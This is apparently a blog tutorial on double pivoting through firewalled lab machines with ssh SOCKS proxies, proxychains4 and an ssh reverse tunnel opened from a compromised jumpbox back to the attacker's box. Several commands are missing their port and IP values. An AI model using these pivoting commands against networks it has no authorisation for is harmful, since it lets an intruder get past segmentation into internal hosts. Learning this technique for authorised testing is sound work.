Double Pivoting using SSH and Proxychains4


Just go to the Demo
Or, just go to the Demo Round 2 for reverse tunneling

Accessing Resources Behind Multiple Resources

At some point, you may run into a situation where you find a vulnerable machine and it has access to a internal network. Well, how do you access that network? And then, say you find another machine on the internal network and it has access to another network? Or, each of these machines is restricted by a hosted-based firewall? Well, you can definitely do it. Most C2 frameworks have this type of thing built in, but we will be doing it using native ssh along with proxychains4, which is available on most distributions.

The Layout

Machines in my lab are as follows:

IP Hostname Notes attack My box jumpbox1.local First jump box jumpbox2.local Second jump box destbox.local Final machine

This is what my lab environment looks like. Green identifies allowed paths, red identifies paths that are blocked via local ufw firewall rules on each box.

You can use your imagination on what jumpbox1.local, jumpbox2.local, and destbox.local are… Webserver, fileserver, privileged workstation, DC. Important thing to know is:

  • attack can only talk to jumpbox1.local
  • jumpbox1.local can only talk to jumpbox2.local
  • jumpbox2.local can only talk to destbox.local

So How Does attack talk to destbox.local?

We use ssh SOCKS proxies. A SOCKS proxy differs from traditional port forwarding in that SOCKS is a protol, whereas port forwarding is routing. If it is easier to visualize using the OSI model, port forwarding occurs at the network layer, while SOCKS proxying works at the application layer. Put simply, you can send any type of network traffic over a port forward: ssh traffic, http traffic, raw bytes, whatever. SOCKS is a protocol, so the communication must occur using the defined protocol.

Thus, we will use the following command to tunnel our SOCKS proxy between two machines;

they@attack.local:~$ ssh -f -N -D user@jumpbox1.local

What each flag does:

Flag Explanation
-f This sends the command to background right before executing a command remotely (think command &)
-N This tells ssh not to execute a command remotely. We are just establishing a tunnel/proxy, no need to execute a command.
-D This tells ssh to establish a local dynamic application-level port forwarding. This is the local port we will send our requests to IE where our SOCKS proxy exists

Once we have a SOCKS proxy established, we can then use proxychains4 to communicate over the newly established tunnel/proxy. I make a local config file to use.

remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4 8888 # From our machine to jumpbox1.local via this command you ran: they@attack.local:~$ ssh -f -N -D user@jumpbox1.local

Once this is in place, you can use the following command to execute commands through the tunnel, and the requests will be performed by jumpbox1.local.

they@attack.local:~$ proxychains4 -f ~/new-proxychains.conf ssh jumpbox2.local

But we still can’t talk to destbox.local ?

Correct… So, we repeat the process on jumpbox1.local

they@attack.local:~$ ssh user@jumpbox1.local 'ssh -f -N -D user@jumpbox2.local'

OR (as in video), just ssh to jumpbox1.local and run:

they@jumpbox1.local:~$ ssh -f -N -D user@jumpbox2.local

And modify our new-proxychains.conf file to include the newly created tunnel/proxy between jumpbox1.local and jumpbox2.local

strict_chain # dynamic_chain would work as well
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4 8888
socks4 9999 # From jumpbox1.local to jumpbox2.local via this command you ran: they@jumpbox1.local:~$ ssh -f -N -D user@jumpbox2.local

Notice the second line is port 9999? That is because proxychains is first going to proxy through on our box to jumpbox1.local, then it is going to proxy through on jumpbox1.local to jumpbox2.local.

proxychains4 is going to try to use each proxy in the order listed. Since we have strict_chain in our config, if one fails then proxychains won’t continue. Not applicable here, but you could do dynamic_chain and if one failed, it would move on to try the next. In our use case, either strict_chain or dynamic_chain works fine.

Now, try again…

they@attack.local:~$ proxychains4 -f ~/new-proxychains.conf curl http://destbox.local

And voila! We can talk to destbox.local through two tunnels/proxies.


But wait, I can’t access SSH on jumpbox1?

So you have a shell on a box, but can’t hit ssh on it? Pretty common as web services may not just expose ssh to the world. ssh reverse tunnels to the rescue!
You’ll want to start an ssh server on your box, probably with systemctl start sshd and then I’d cat ~/.ssh/*.pub on jumpbox1 and add that to whatever ssh user you plan to use (not a bad idea to create a separate user for this and restrict accordingly to just tunnels, but you do you…)
Once that is complete, from the jumpbox, you’ll run

they@jumpbox1.local:~$ ssh -f -N -R 2222: <you>@attack.local

Now, hop back to your attack box and run ss -tlpn | grep 2222 and you should see the new listening port on Now, just create your initial SOCKS proxy through that new tunnel (or use it to ssh into wordpress directly from your machine)

they@attack.local:~$ ssh -f -N -D <jumpbox1-user>@ -p 2222

Or, if you want a oneliner that can do it all from jumpbox1.local

they@jumpbox1.local:~$ ssh -f -R 2222: attack.local "ssh -f -N -D 8888 -p 2222"

And magic happens…

And from here, you’d do the rest as shown in part 2 from above.

Demo Round 2


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